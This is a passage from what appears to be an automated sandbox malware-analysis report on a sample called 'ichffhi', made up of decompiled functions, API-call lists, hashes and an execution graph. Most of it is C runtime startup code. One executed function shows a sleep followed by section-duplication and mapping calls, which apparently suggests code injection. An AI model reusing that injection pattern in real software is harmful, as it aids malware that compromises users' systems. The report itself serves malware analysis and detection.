                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction ID: 6ef1ed1bf64fe5eabda647e92d7164afe002825c4aa424cea749e35a608ab800
                    • Opcode Fuzzy Hash: f592541f30fbcca03b96e500b31fa5f982bcaff6f64a27eb3c64f1708acf91e7
                    • Instruction Fuzzy Hash: 55F01277204105E7DB057AA19C41EA92629DB05355F20C937BA13B84F1C63CC712AB6B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040181F Relevance: 1.3, APIs: 1, Instructions: 37sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 354 40181f-40184a call 401134 Sleep call 401366 360 401859-40185f 354->360 361 40184c-401854 call 40143b 354->361 364 401865-40188e call 401134 360->364 365 40186e 360->365 361->360 365->364
                    C-Code - Quality: 55%
                    			E0040181F(void* __edi, void* __eflags, void* __fp0) {
				void* _t8;
				void* _t11;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t27 = __fp0;
				_t25 = __eflags;
				_t21 = __edi;
				_pop(_t22);
				E00401134(_t8, __edi, __eflags, __fp0);
				_t16 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_t11 = L00401366(_t20, _t25, _t16,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
				_t26 = _t11;
				if(_t11 != 0) {
					E0040143B(_t26, _t16, _t11,  *((intOrPtr*)(_t22 - 4)),  *((intOrPtr*)(_t22 + 0x14))); // executed
				}
				 *_t16(0xffffffff, 0);
				_t14 = E00401134(0x182d, _t21, _t26, _t27);
				[far dword [edi+0x5e]();
				return _t14;
			}









                    0x0040181f
                    0x0040181f
                    0x0040181f
                    0x0040181f
                    0x00401828
                    0x0040182d
                    0x00401835
                    0x00401843
                    0x00401848
                    0x0040184a
                    0x00401854
                    0x00401854
                    0x0040185d
                    0x00401885
                    0x00401889
                    0x0040188e

                    APIs
                    • Sleep.KERNELBASE(00001388), ref: 00401835
                      • Part of subcall function 0040143B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                      • Part of subcall function 0040143B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                      • Part of subcall function 0040143B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    Memory Dump Source
                    • Source File: 00000002.00000002.430871790.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_ichffhi.jbxd
                    Similarity
                    • API ID: Section$CreateDuplicateObjectSleepView
                    • String ID:
                    • API String ID: 1885482327-0
                    • Opcode ID: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction ID: 22086707188f3d238c80ea2b1502365f527a58e6f5fc57b11dc43d2376d567d0
                    • Opcode Fuzzy Hash: 499b95e636ba847a66cd2fb4256d29b3f3f23bbd9eaf3472c39998fbc980e936
                    • Instruction Fuzzy Hash: 20F03077604104EBDB05BBA58C41EA93729EB05355F208537FA12B84F1CA3DC712AB2B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 0040B45C Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 204COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B46C
                    • __isctype_l.LIBCMT ref: 0040B4DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: Locale$UpdateUpdate::___isctype_l
                    • String ID: $$+$-$0$0
                    • API String ID: 2547950892-4042548909
                    • Opcode ID: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction ID: 97537141d6d2858a3edd09e828bcdb1ecb2a0de928e4cfbf47729112040edc5f
                    • Opcode Fuzzy Hash: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction Fuzzy Hash: 3B71D270900249AADF25CF28C9557AB7BA0EF51358F2805BBE851B62D1C3398E91C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B81A Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: __fileno__flsbuf__flush__locking
                    • String ID:
                    • API String ID: 2259706978-0
                    • Opcode ID: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction ID: d9b0b9fd459113351f921aa778dd8b20b1cf5d34ba7c7a55e35930b3a3d7b7cc
                    • Opcode Fuzzy Hash: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction Fuzzy Hash: B1418272A006059BDB24AF65888459FBBB9EF80360B24C53EE865B72D0D778DD419B8C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004123A5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.430892447.0000000000409000.00000020.00000001.01000000.00000006.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_409000_ichffhi.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction ID: 8f06ba0e6be14d774fc29792ef997f0c6ad8488ad82e83f8fd62a1598589dc5c
                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction Fuzzy Hash: D5118C3204014EBBCF165F85DD01CEE3F62BB18354B588416FE2898131D37AC9B2AB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:2.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:6.1%
                    Total number of Nodes:1782
                    Total number of Limit Nodes:16
                    execution_graph 8883 407452 8929 409480 8883->8929 8885 40745e GetStartupInfoA 8887 407481 8885->8887 8930 40ce1f HeapCreate 8887->8930 8892 4074d1 8932 408d3a GetModuleHandleW 8892->8932 8893 4074e2 __RTC_Initialize 8966 40a554 8893->8966 8894 407429 _fast_error_exit 68 API calls 8894->8893 8896 4074f0 8897 4074fc GetCommandLineA 8896->8897 9044 40c2bd 8896->9044 8981 40cc9c 8897->8981 8903 407516 8904 407522 8903->8904 8905 40751a 8903->8905 9006 40c969 8904->9006 8906 40c2bd __amsg_exit 68 API calls 8905->8906 8908 407521 8906->8908 8908->8904 8910 407533 9021 40c37c 8910->9021 8911 40752b 8912 40c2bd __amsg_exit 68 API calls 8911->8912 8914 407532 8912->8914 8914->8910 8915 407539 8916 407545 8915->8916 8917 40753e 8915->8917 9027 40c90a 8916->9027 8919 40c2bd __amsg_exit 68 API calls 8917->8919 8920 407544 8919->8920 8920->8916 8921 40754a 8922 40754f 8921->8922 9033 4066d0 8921->9033 8922->8921 8925 407573 9065 40c559 8925->9065 8928 407578 ___lock_fhandle 8929->8885 8931 4074c5 8930->8931 8931->8892 9036 407429 8931->9036 8933 408d55 8932->8933 8934 408d4e 8932->8934 8936 408ebd 8933->8936 8937 408d5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8933->8937 9068 40c28d 8934->9068 9129 408a54 8936->9129 8940 408da8 TlsAlloc 8937->8940 8942 4074d7 8940->8942 8943 408df6 TlsSetValue 8940->8943 8942->8893 8942->8894 8943->8942 8944 408e07 8943->8944 9072 40c577 8944->9072 8949 40892a __encode_pointer 7 API calls 8950 408e27 8949->8950 8951 40892a __encode_pointer 7 API calls 8950->8951 8952 408e37 8951->8952 8953 40892a __encode_pointer 7 API calls 8952->8953 8954 408e47 8953->8954 9091 40df9b 8954->9091 8961 4089a5 __decode_pointer 6 API calls 8962 408e9b 8961->8962 8962->8936 8963 408ea2 8962->8963 9111 408a91 8963->9111 8965 408eaa GetCurrentThreadId 8965->8942 9462 409480 8966->9462 8968 40a560 GetStartupInfoA 8969 41065a __calloc_crt 68 API calls 8968->8969 8975 40a581 8969->8975 8970 40a79f ___lock_fhandle 8970->8896 8971 40a71c GetStdHandle 8976 40a6e6 8971->8976 8972 40a781 SetHandleCount 8972->8970 8973 41065a __calloc_crt 68 API calls 8973->8975 8974 40a72e GetFileType 8974->8976 8975->8970 8975->8973 8975->8976 8979 40a669 8975->8979 8976->8970 8976->8971 8976->8972 8976->8974 8977 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8976->8977 8977->8976 8978 40a692 GetFileType 8978->8979 8979->8970 8979->8976 8979->8978 8980 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 8979->8980 8980->8979 8982 40ccd9 8981->8982 8983 40ccba GetEnvironmentStringsW 8981->8983 8984 40ccc2 8982->8984 8986 40cd72 8982->8986 8983->8984 8985 40ccce GetLastError 8983->8985 8987 40cd04 WideCharToMultiByte 8984->8987 8988 40ccf5 GetEnvironmentStringsW 8984->8988 8985->8982 8989 40cd7b GetEnvironmentStrings 8986->8989 8990 40750c 8986->8990 8993 40cd67 FreeEnvironmentStringsW 8987->8993 8994 40cd38 8987->8994 8988->8987 8988->8990 8989->8990 8991 40cd8b 8989->8991 9051 40cbe1 8990->9051 8995 410615 __malloc_crt 68 API calls 8991->8995 8993->8990 8996 410615 __malloc_crt 68 API calls 8994->8996 8997 40cda5 8995->8997 8998 40cd3e 8996->8998 8999 40cdb8 ___crtGetEnvironmentStringsA 8997->8999 9000 40cdac FreeEnvironmentStringsA 8997->9000 8998->8993 9001 40cd46 WideCharToMultiByte 8998->9001 9004 40cdc2 FreeEnvironmentStringsA 8999->9004 9000->8990 9002 40cd60 9001->9002 9003 40cd58 9001->9003 9002->8993 9005 408391 ___crtGetEnvironmentStringsA 68 API calls 9003->9005 9004->8990 9005->9002 9007 40c972 9006->9007 9010 40c977 _strlen 9006->9010 9463 4105f7 9007->9463 9009 41065a __calloc_crt 68 API calls 9016 40c9ac _strlen 9009->9016 9010->9009 9013 407527 9010->9013 9011 40ca0a 9012 408391 ___crtGetEnvironmentStringsA 68 API calls 9011->9012 9012->9013 9013->8910 9013->8911 9014 41065a __calloc_crt 68 API calls 9014->9016 9015 40ca30 9017 408391 ___crtGetEnvironmentStringsA 68 API calls 9015->9017 9016->9011 9016->9013 9016->9014 9016->9015 9018 408210 _strcpy_s 68 API calls 9016->9018 9019 40c9f1 9016->9019 9017->9013 9018->9016 9019->9016 9020 4069e1 __invoke_watson 10 API calls 9019->9020 9020->9019 9022 40c38a __IsNonwritableInCurrentImage 9021->9022 9868 4116cb 9022->9868 9024 40c3a8 __initterm_e 9026 40c3c7 __IsNonwritableInCurrentImage __initterm 9024->9026 9872 40c1ef 9024->9872 9026->8915 9028 40c918 9027->9028 9031 40c91d 9027->9031 9029 4105f7 ___initmbctable 112 API calls 9028->9029 9029->9031 9030 40c959 9030->8921 9031->9030 9972 4138ed 9031->9972 9978 4059a0 9033->9978 9035 4066ea 9035->8925 9062 40c52d 9035->9062 9037 407437 9036->9037 9038 40743c 9036->9038 9039 40c770 __FF_MSGBANNER 68 API calls 9037->9039 9040 40c5c5 __NMSG_WRITE 68 API calls 9038->9040 9039->9038 9041 407444 9040->9041 9042 40c311 _doexit 3 API calls 9041->9042 9043 40744e 9042->9043 9043->8892 9045 40c770 __FF_MSGBANNER 68 API calls 9044->9045 9046 40c2c7 9045->9046 9047 40c5c5 __NMSG_WRITE 68 API calls 9046->9047 9048 40c2cf 9047->9048 9049 4089a5 __decode_pointer 6 API calls 9048->9049 9050 4074fb 9049->9050 9050->8897 9052 40cbf6 9051->9052 9053 40cbfb GetModuleFileNameA 9051->9053 9054 4105f7 ___initmbctable 112 API calls 9052->9054 9055 40cc22 9053->9055 9054->9053 10944 40ca47 9055->10944 9057 40cc7e 9057->8903 9059 410615 __malloc_crt 68 API calls 9060 40cc64 9059->9060 9060->9057 9061 40ca47 _parse_cmdline 78 API calls 9060->9061 9061->9057 9063 40c401 _doexit 68 API calls 9062->9063 9064 40c53e 9063->9064 9064->8925 9066 40c401 _doexit 68 API calls 9065->9066 9067 40c564 9066->9067 9067->8928 9069 40c298 Sleep GetModuleHandleW 9068->9069 9070 40c2b6 9069->9070 9071 408d54 9069->9071 9070->9069 9070->9071 9071->8933 9140 40899c 9072->9140 9074 40c57f __init_pointers __initp_misc_winsig 9143 40700e 9074->9143 9077 40892a __encode_pointer 7 API calls 9078 408e0c 9077->9078 9079 40892a TlsGetValue 9078->9079 9080 408942 9079->9080 9081 408963 GetModuleHandleW 9079->9081 9080->9081 9082 40894c TlsGetValue 9080->9082 9083 408973 9081->9083 9084 40897e GetProcAddress 9081->9084 9087 408957 9082->9087 9085 40c28d __crt_waiting_on_module_handle 2 API calls 9083->9085 9086 40895b 9084->9086 9088 408979 9085->9088 9089 408996 9086->9089 9090 40898e RtlEncodePointer 9086->9090 9087->9081 9087->9086 9088->9084 9088->9089 9089->8949 9090->9089 9092 40dfa6 9091->9092 9094 408e54 9092->9094 9146 411376 9092->9146 9094->8936 9095 4089a5 TlsGetValue 9094->9095 9096 4089bd 9095->9096 9097 4089de GetModuleHandleW 9095->9097 9096->9097 9098 4089c7 TlsGetValue 9096->9098 9099 4089f9 GetProcAddress 9097->9099 9100 4089ee 9097->9100 9103 4089d2 9098->9103 9102 4089d6 9099->9102 9101 40c28d __crt_waiting_on_module_handle 2 API calls 9100->9101 9104 4089f4 9101->9104 9102->8936 9105 41065a 9102->9105 9103->9097 9103->9102 9104->9099 9104->9102 9108 410663 9105->9108 9107 408e81 9107->8936 9107->8961 9108->9107 9109 410681 Sleep 9108->9109 9151 4148fa 9108->9151 9110 410696 9109->9110 9110->9107 9110->9108 9441 409480 9111->9441 9113 408a9d GetModuleHandleW 9114 408ab3 9113->9114 9115 408aad 9113->9115 9117 408acb GetProcAddress GetProcAddress 9114->9117 9118 408aef 9114->9118 9116 40c28d __crt_waiting_on_module_handle 2 API calls 9115->9116 9116->9114 9117->9118 9119 40e117 __lock 64 API calls 9118->9119 9120 408b0e InterlockedIncrement 9119->9120 9442 408b66 9120->9442 9123 40e117 __lock 64 API calls 9124 408b2f 9123->9124 9445 40fd56 InterlockedIncrement 9124->9445 9126 408b4d 9457 408b6f 9126->9457 9128 408b5a ___lock_fhandle 9128->8965 9130 408a6a 9129->9130 9131 408a5e 9129->9131 9133 408a7e TlsFree 9130->9133 9134 408a8c 9130->9134 9132 4089a5 __decode_pointer 6 API calls 9131->9132 9132->9130 9133->9134 9135 40e002 DeleteCriticalSection 9134->9135 9136 40e01a 9134->9136 9137 408391 ___crtGetEnvironmentStringsA 68 API calls 9135->9137 9138 40e02c DeleteCriticalSection 9136->9138 9139 40e03a 9136->9139 9137->9134 9138->9136 9139->8942 9141 40892a __encode_pointer 7 API calls 9140->9141 9142 4089a3 9141->9142 9142->9074 9144 40892a __encode_pointer 7 API calls 9143->9144 9145 407018 9144->9145 9145->9077 9150 409480 9146->9150 9148 411382 InitializeCriticalSectionAndSpinCount 9149 4113c6 ___lock_fhandle 9148->9149 9149->9092 9150->9148 9152 414906 ___lock_fhandle 9151->9152 9153 41491e 9152->9153 9163 41493d _memset 9152->9163 9164 407e97 9153->9164 9156 4149af RtlAllocateHeap 9156->9163 9158 414933 ___lock_fhandle 9158->9108 9163->9156 9163->9158 9170 40e117 9163->9170 9177 40e929 9163->9177 9183 4149f6 9163->9183 9186 40c215 9163->9186 9189 408b78 GetLastError 9164->9189 9166 407e9c 9167 406b09 9166->9167 9168 4089a5 __decode_pointer 6 API calls 9167->9168 9169 406b19 __cftoe_l 9168->9169 9171 40e12c 9170->9171 9172 40e13f EnterCriticalSection 9170->9172 9236 40e054 9171->9236 9172->9163 9174 40e132 9174->9172 9175 40c2bd __amsg_exit 67 API calls 9174->9175 9176 40e13e 9175->9176 9176->9172 9180 40e957 9177->9180 9178 40e9f0 9181 40e9f9 9178->9181 9436 40e540 9178->9436 9180->9178 9180->9181 9429 40e490 9180->9429 9181->9163 9440 40e03d LeaveCriticalSection 9183->9440 9185 4149fd 9185->9163 9187 4089a5 __decode_pointer 6 API calls 9186->9187 9188 40c225 9187->9188 9188->9163 9203 408a20 TlsGetValue 9189->9203 9191 408be5 SetLastError 9191->9166 9193 41065a __calloc_crt 65 API calls 9194 408ba3 9193->9194 9194->9191 9195 4089a5 __decode_pointer 6 API calls 9194->9195 9196 408bbd 9195->9196 9197 408bc4 9196->9197 9198 408bdc 9196->9198 9199 408a91 __mtinit 65 API calls 9197->9199 9208 408391 9198->9208 9201 408bcc GetCurrentThreadId 9199->9201 9201->9191 9202 408be2 9202->9191 9204 408a50 9203->9204 9205 408a35 9203->9205 9204->9191 9204->9193 9206 4089a5 __decode_pointer 6 API calls 9205->9206 9207 408a40 TlsSetValue 9206->9207 9207->9204 9210 40839d ___lock_fhandle 9208->9210 9209 408416 ___lock_fhandle _realloc 9209->9202 9210->9209 9212 40e117 __lock 66 API calls 9210->9212 9220 4083dc 9210->9220 9211 4083f1 HeapFree 9211->9209 9213 408403 9211->9213 9217 4083b4 ___sbh_find_block 9212->9217 9214 407e97 __cftoe_l 66 API calls 9213->9214 9215 408408 GetLastError 9214->9215 9215->9209 9216 4083ce 9228 4083e7 9216->9228 9217->9216 9221 40e17a 9217->9221 9220->9209 9220->9211 9222 40e1b9 9221->9222 9227 40e45b 9221->9227 9223 40e3a5 VirtualFree 9222->9223 9222->9227 9224 40e409 9223->9224 9225 40e418 VirtualFree HeapFree 9224->9225 9224->9227 9231 407af0 9225->9231 9227->9216 9235 40e03d LeaveCriticalSection 9228->9235 9230 4083ee 9230->9220 9232 407b08 9231->9232 9233 407b2f __VEC_memcpy 9232->9233 9234 407b37 9232->9234 9233->9234 9234->9227 9235->9230 9237 40e060 ___lock_fhandle 9236->9237 9238 40e086 9237->9238 9262 40c770 9237->9262 9244 40e096 ___lock_fhandle 9238->9244 9308 410615 9238->9308 9244->9174 9246 40e0b7 9248 40e117 __lock 68 API calls 9246->9248 9247 40e0a8 9250 407e97 __cftoe_l 68 API calls 9247->9250 9251 40e0be 9248->9251 9250->9244 9252 40e0f2 9251->9252 9253 40e0c6 9251->9253 9255 408391 ___crtGetEnvironmentStringsA 68 API calls 9252->9255 9254 411376 ___lock_fhandle InitializeCriticalSectionAndSpinCount 9253->9254 9256 40e0d1 9254->9256 9257 40e0e3 9255->9257 9256->9257 9259 408391 ___crtGetEnvironmentStringsA 68 API calls 9256->9259 9314 40e10e 9257->9314 9260 40e0dd 9259->9260 9261 407e97 __cftoe_l 68 API calls 9260->9261 9261->9257 9317 41384f 9262->9317 9265 40c784 9267 40c5c5 __NMSG_WRITE 68 API calls 9265->9267 9270 40c7a6 9265->9270 9266 41384f __set_error_mode 68 API calls 9266->9265 9268 40c79c 9267->9268 9269 40c5c5 __NMSG_WRITE 68 API calls 9268->9269 9269->9270 9271 40c5c5 9270->9271 9272 40c5d9 9271->9272 9273 41384f __set_error_mode 65 API calls 9272->9273 9304 40c734 9272->9304 9274 40c5fb 9273->9274 9275 40c739 GetStdHandle 9274->9275 9277 41384f __set_error_mode 65 API calls 9274->9277 9276 40c747 _strlen 9275->9276 9275->9304 9280 40c760 WriteFile 9276->9280 9276->9304 9278 40c60c 9277->9278 9278->9275 9279 40c61e 9278->9279 9279->9304 9323 408210 9279->9323 9280->9304 9283 40c654 GetModuleFileNameA 9285 40c672 9283->9285 9289 40c695 _strlen 9283->9289 9287 408210 _strcpy_s 65 API calls 9285->9287 9288 40c682 9287->9288 9288->9289 9291 4069e1 __invoke_watson 10 API calls 9288->9291 9290 40c6d8 9289->9290 9339 41379a 9289->9339 9348 413726 9290->9348 9291->9289 9296 40c6fc 9298 413726 _strcat_s 65 API calls 9296->9298 9297 4069e1 __invoke_watson 10 API calls 9297->9296 9300 40c710 9298->9300 9299 4069e1 __invoke_watson 10 API calls 9299->9290 9301 40c721 9300->9301 9302 4069e1 __invoke_watson 10 API calls 9300->9302 9357 4135bd 9301->9357 9302->9301 9305 40c311 9304->9305 9395 40c2e6 GetModuleHandleW 9305->9395 9309 41061e 9308->9309 9311 40e0a1 9309->9311 9312 410635 Sleep 9309->9312 9398 4082c7 9309->9398 9311->9246 9311->9247 9313 41064a 9312->9313 9313->9309 9313->9311 9428 40e03d LeaveCriticalSection 9314->9428 9316 40e115 9316->9244 9318 41385e 9317->9318 9319 40c777 9318->9319 9320 407e97 __cftoe_l 68 API calls 9318->9320 9319->9265 9319->9266 9321 413881 9320->9321 9322 406b09 __cftoe_l 6 API calls 9321->9322 9322->9319 9324 408221 9323->9324 9325 408228 9323->9325 9324->9325 9330 40824e 9324->9330 9326 407e97 __cftoe_l 68 API calls 9325->9326 9327 40822d 9326->9327 9328 406b09 __cftoe_l 6 API calls 9327->9328 9329 40823c 9328->9329 9329->9283 9332 4069e1 9329->9332 9330->9329 9331 407e97 __cftoe_l 68 API calls 9330->9331 9331->9327 9384 4088b0 9332->9384 9334 406a0e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9335 406aea GetCurrentProcess TerminateProcess 9334->9335 9336 406ade 9334->9336 9386 407aab 9335->9386 9338 406b07 9338->9283 9343 4137ac 9339->9343 9340 4137b0 9341 40c6c5 9340->9341 9342 407e97 __cftoe_l 68 API calls 9340->9342 9341->9290 9341->9299 9344 4137cc 9342->9344 9343->9340 9343->9341 9346 4137f6 9343->9346 9345 406b09 __cftoe_l 6 API calls 9344->9345 9345->9341 9346->9341 9347 407e97 __cftoe_l 68 API calls 9346->9347 9347->9344 9349 41373e 9348->9349 9351 413737 9348->9351 9350 407e97 __cftoe_l 68 API calls 9349->9350 9356 413743 9350->9356 9351->9349 9354 413772 9351->9354 9352 406b09 __cftoe_l 6 API calls 9353 40c6eb 9352->9353 9353->9296 9353->9297 9354->9353 9355 407e97 __cftoe_l 68 API calls 9354->9355 9355->9356 9356->9352 9358 40899c __init_pointers 7 API calls 9357->9358 9359 4135cd 9358->9359 9360 4135e0 LoadLibraryA 9359->9360 9362 413668 9359->9362 9361 4135f5 GetProcAddress 9360->9361 9374 41370a 9360->9374 9363 41360b 9361->9363 9361->9374 9367 4089a5 __decode_pointer 6 API calls 9362->9367 9383 413692 9362->9383 9364 40892a __encode_pointer 7 API calls 9363->9364 9368 413611 GetProcAddress 9364->9368 9365 4089a5 __decode_pointer 6 API calls 9365->9374 9366 4089a5 __decode_pointer 6 API calls 9375 4136d5 9366->9375 9369 413685 9367->9369 9371 40892a __encode_pointer 7 API calls 9368->9371 9370 4089a5 __decode_pointer 6 API calls 9369->9370 9370->9383 9372 413626 GetProcAddress 9371->9372 9373 40892a __encode_pointer 7 API calls 9372->9373 9376 41363b GetProcAddress 9373->9376 9374->9304 9378 4089a5 __decode_pointer 6 API calls 9375->9378 9380 4136bd 9375->9380 9377 40892a __encode_pointer 7 API calls 9376->9377 9379 413650 9377->9379 9378->9380 9379->9362 9381 41365a GetProcAddress 9379->9381 9380->9365 9382 40892a __encode_pointer 7 API calls 9381->9382 9382->9362 9383->9366 9383->9380 9385 4088bc __VEC_memzero 9384->9385 9385->9334 9387 407ab3 9386->9387 9388 407ab5 IsDebuggerPresent 9386->9388 9387->9338 9394 4088a3 9388->9394 9391 40dcb9 SetUnhandledExceptionFilter UnhandledExceptionFilter 9392 40dcde GetCurrentProcess TerminateProcess 9391->9392 9393 40dcd6 __cftoe_l 9391->9393 9392->9338 9393->9392 9394->9391 9396 40c2fa GetProcAddress 9395->9396 9397 40c30a ExitProcess 9395->9397 9396->9397 9399 40837a 9398->9399 9409 4082d9 9398->9409 9400 40c215 _realloc 6 API calls 9399->9400 9401 408380 9400->9401 9402 407e97 __cftoe_l 67 API calls 9401->9402 9415 408372 9402->9415 9403 40c770 __FF_MSGBANNER 67 API calls 9407 4082ea 9403->9407 9404 40c5c5 __NMSG_WRITE 67 API calls 9404->9407 9406 408336 RtlAllocateHeap 9406->9409 9407->9403 9407->9404 9408 40c311 _doexit 3 API calls 9407->9408 9407->9409 9408->9407 9409->9406 9409->9407 9410 408366 9409->9410 9411 40c215 _realloc 6 API calls 9409->9411 9413 40836b 9409->9413 9409->9415 9416 408278 9409->9416 9412 407e97 __cftoe_l 67 API calls 9410->9412 9411->9409 9412->9413 9414 407e97 __cftoe_l 67 API calls 9413->9414 9414->9415 9415->9309 9417 408284 ___lock_fhandle 9416->9417 9418 4082b5 ___lock_fhandle 9417->9418 9419 40e117 __lock 68 API calls 9417->9419 9418->9409 9420 40829a 9419->9420 9421 40e929 ___sbh_alloc_block 5 API calls 9420->9421 9422 4082a5 9421->9422 9424 4082be 9422->9424 9427 40e03d LeaveCriticalSection 9424->9427 9426 4082c5 9426->9418 9427->9426 9428->9316 9430 40e4a3 HeapReAlloc 9429->9430 9431 40e4d7 HeapAlloc 9429->9431 9432 40e4c5 9430->9432 9434 40e4c1 9430->9434 9433 40e4fa VirtualAlloc 9431->9433 9431->9434 9432->9431 9433->9434 9435 40e514 HeapFree 9433->9435 9434->9178 9435->9434 9437 40e557 VirtualAlloc 9436->9437 9439 40e59e 9437->9439 9439->9181 9440->9185 9441->9113 9460 40e03d LeaveCriticalSection 9442->9460 9444 408b28 9444->9123 9446 40fd74 InterlockedIncrement 9445->9446 9447 40fd77 9445->9447 9446->9447 9448 40fd81 InterlockedIncrement 9447->9448 9449 40fd84 9447->9449 9448->9449 9450 40fd91 9449->9450 9451 40fd8e InterlockedIncrement 9449->9451 9452 40fd9b InterlockedIncrement 9450->9452 9454 40fd9e 9450->9454 9451->9450 9452->9454 9453 40fdb7 InterlockedIncrement 9453->9454 9454->9453 9455 40fdc7 InterlockedIncrement 9454->9455 9456 40fdd2 InterlockedIncrement 9454->9456 9455->9454 9456->9126 9461 40e03d LeaveCriticalSection 9457->9461 9459 408b76 9459->9128 9460->9444 9461->9459 9462->8968 9464 410600 9463->9464 9465 410607 9463->9465 9467 41045d 9464->9467 9465->9010 9468 410469 ___lock_fhandle 9467->9468 9498 408bf1 9468->9498 9472 41047c 9519 4101fc 9472->9519 9475 410615 __malloc_crt 68 API calls 9476 41049d 9475->9476 9477 4105bc ___lock_fhandle 9476->9477 9526 410278 9476->9526 9477->9465 9480 4105c9 9480->9477 9484 4105dc 9480->9484 9486 408391 ___crtGetEnvironmentStringsA 68 API calls 9480->9486 9481 4104cd InterlockedDecrement 9482 4104dd 9481->9482 9483 4104ee InterlockedIncrement 9481->9483 9482->9483 9488 408391 ___crtGetEnvironmentStringsA 68 API calls 9482->9488 9483->9477 9485 410504 9483->9485 9487 407e97 __cftoe_l 68 API calls 9484->9487 9485->9477 9490 40e117 __lock 68 API calls 9485->9490 9486->9484 9487->9477 9489 4104ed 9488->9489 9489->9483 9492 410518 InterlockedDecrement 9490->9492 9493 410594 9492->9493 9494 4105a7 InterlockedIncrement 9492->9494 9493->9494 9496 408391 ___crtGetEnvironmentStringsA 68 API calls 9493->9496 9536 4105be 9494->9536 9497 4105a6 9496->9497 9497->9494 9499 408b78 __getptd_noexit 68 API calls 9498->9499 9500 408bf9 9499->9500 9501 408c06 9500->9501 9502 40c2bd __amsg_exit 68 API calls 9500->9502 9503 410158 9501->9503 9502->9501 9504 410164 ___lock_fhandle 9503->9504 9505 408bf1 __getptd 68 API calls 9504->9505 9506 410169 9505->9506 9507 41017b 9506->9507 9508 40e117 __lock 68 API calls 9506->9508 9511 410189 ___lock_fhandle 9507->9511 9515 40c2bd __amsg_exit 68 API calls 9507->9515 9509 410199 9508->9509 9510 4101e2 9509->9510 9512 4101b0 InterlockedDecrement 9509->9512 9513 4101ca InterlockedIncrement 9509->9513 9539 4101f3 9510->9539 9511->9472 9512->9513 9516 4101bb 9512->9516 9513->9510 9515->9511 9516->9513 9517 408391 ___crtGetEnvironmentStringsA 68 API calls 9516->9517 9518 4101c9 9517->9518 9518->9513 9543 40988f 9519->9543 9522 410239 9524 41023e GetACP 9522->9524 9525 41022b 9522->9525 9523 41021b GetOEMCP 9523->9525 9524->9525 9525->9475 9525->9477 9527 4101fc getSystemCP 80 API calls 9526->9527 9528 410298 9527->9528 9529 4102a3 setSBCS 9528->9529 9531 4102e7 IsValidCodePage 9528->9531 9535 41030c _memset __setmbcp_nolock 9528->9535 9530 407aab __atodbl_l 5 API calls 9529->9530 9532 41045b 9530->9532 9531->9529 9533 4102f9 GetCPInfo 9531->9533 9532->9480 